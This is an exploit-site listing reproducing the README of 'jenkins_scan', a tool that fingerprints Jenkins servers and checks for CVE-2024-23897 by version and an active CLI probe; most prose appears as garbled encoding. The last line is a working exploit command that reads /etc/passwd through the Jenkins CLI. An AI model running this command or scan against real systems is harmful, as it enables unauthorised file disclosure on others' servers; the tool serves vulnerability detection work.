Sploitus

Exploit for jenkins_scan

kitploit ┬╖ 2026-08-28

Exploit Code

MARKDOWN48 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-W41L3R-JENKINS_SCAN
# jenkins_scan

рдЬреЗрдирдХрд┐рдВрд╕ рд╡рд╛рддрд╛рд╡рд░рдг рдЦреЛрдЬреЗрдВ рдФрд░ CVE-2024-23897 рдХреА рдЬрд╛рдБрдЪ рдХрд░реЗрдВ

## рдпрд╣ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ

### рдЬреЗрдирдХрд┐рдВрд╕ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдирд╛

рдкрдереЛрдВ рдХрд╛ рдкрд░реАрдХреНрд╖рдг: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json

рдЗрд╕рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкрд╣рдЪрд╛рдирддрд╛ рд╣реИ:

  1. Header X-Jenkins тАФ рдЕрдзрд┐рдХ рд╡рд┐рд╢реНрд╡рд╕рдиреАрдп, рд╕рдВрд╕реНрдХрд░рдг рднреА рд▓реМрдЯрд╛рддрд╛ рд╣реИ
  2. Header X-Hudson тАФ рдкреБрд░рд╛рдиреЗ рдЙрджрд╛рд╣рд░рдг
  3. Body HTML тАФ рд╕реНрдЯреНрд░рд┐рдВрдЧреНрд╕ рдЬреИрд╕реЗ "login to jenkins", "hudson.model", рдЖрджрд┐ред
  4. /api/json тАФ JSON рд╕рдВрд░рдЪрдирд╛ (_class, jobs, views) рд╕реЗ рдкреБрд╖реНрдЯрд┐ рдХрд░рддрд╛ рд╣реИ



### CVE-2024-23897 рдХреА рдЬрд╛рдБрдЪ

рдирд┐рд╖реНрдХреНрд░рд┐рдп (рдбрд┐рдлрд╝реЙрд▓реНрдЯ): рдкрддрд╛ рд▓рдЧрд╛рдП рдЧрдП рд╕рдВрд╕реНрдХрд░рдг рдХреА thresholds рд╕реЗ рддреБрд▓рдирд╛ рдХрд░рддрд╛ рд╣реИ:

  * Weekly: < 2.442 тЖТ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд
  * LTS: < 2.426.3 тЖТ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд



рд╕рдХреНрд░рд┐рдп (--active): HTTP рдкрд░ Jenkins CLI рдХреЗ рдмрд╛рдЗрдирд░реА рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рд╣реИрдВрдбрд╢реЗрдХ рднреЗрдЬрддрд╛ рд╣реИред рдпрджрд┐ рд╕рд░реНрд╡рд░ 200 + Content-Type: application/octet-stream рдХреЗ рд╕рд╛рде рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдХрд░рддрд╛ рд╣реИ, рддреЛ рдпрд╣ рдкреБрд╖реНрдЯрд┐ рдХрд░рддрд╛ рд╣реИ рдХрд┐ CLI рдЪреИрдирд▓ рдЦреБрд▓рд╛ рд╣реИ рдФрд░ exploit рд▓рд╛рдЧреВ рд╣реИред

## рдЙрдкрдпреЛрдЧ

### рдмреБрдирд┐рдпрд╛рджреА рд╕реНрдХреИрди

python jenkins_scan.py -f urls.txt

### рд╕рдХреНрд░рд┐рдп рдкреНрд░реЛрдм + Burp рдкреНрд░реЙрдХреНрд╕реА рдХреЗ рд░реВрдк рдореЗрдВ + рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдЖрдЙрдЯрдкреБрдЯ

python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt

### 20 рдереНрд░реЗрдб, рд╡рд░реНрдмреЛрдЬрд╝, рдмрд┐рдирд╛ рд░рдВрдЧ (pipe/grep рдХреЗ рд▓рд┐рдП)

python jenkins_scan.py -f urls.txt -t 20 -v --no-color

### рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд▓рдХреНрд╖реНрдп рдкрд░ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ exploit рдХреА рдкреБрд╖реНрдЯрд┐ рдХрд░реЗрдВ

java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"